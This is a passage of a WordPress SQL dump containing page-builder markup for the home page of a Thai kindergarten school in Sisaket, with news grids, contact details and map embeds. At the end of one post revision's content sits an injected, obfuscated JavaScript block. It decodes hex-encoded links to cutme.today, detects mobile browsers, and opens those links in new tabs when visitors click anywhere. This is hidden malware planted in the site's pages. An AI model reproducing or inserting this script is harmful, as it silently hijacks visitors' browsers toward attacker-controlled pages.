-->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 13:36:29','2024-08-30 06:36:29','',19,'http://watprato.ssk.in.th/?p=337',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(338,2,'2024-08-30 13:54:28','2024-08-30 06:54:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 